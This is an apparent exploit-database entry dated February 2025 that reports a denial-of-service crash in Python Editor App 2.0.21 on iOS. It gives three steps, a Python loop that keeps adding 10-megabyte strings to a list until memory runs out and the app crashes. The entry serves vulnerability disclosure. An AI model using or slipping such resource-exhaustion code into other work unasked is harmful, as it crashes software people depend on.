# Exploit Title: Python Editor App 2.0.21 IOS ( DOS ) # Date: 02/14/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://apps.apple.com/it/developer/andromeda-corp-ltd/id1745089768?l=en-GB # Software Link: https://apps.apple.com/it/app/python-editor-app/id1672453872?l=en-GB # Version: 2.0.21 # Tested on: IOS 18.3.1 1. Create a new file any name.py 2. Put the following code: array = [] while True: array.append("A" * 10000000) 3. Once you run the code the app will crash.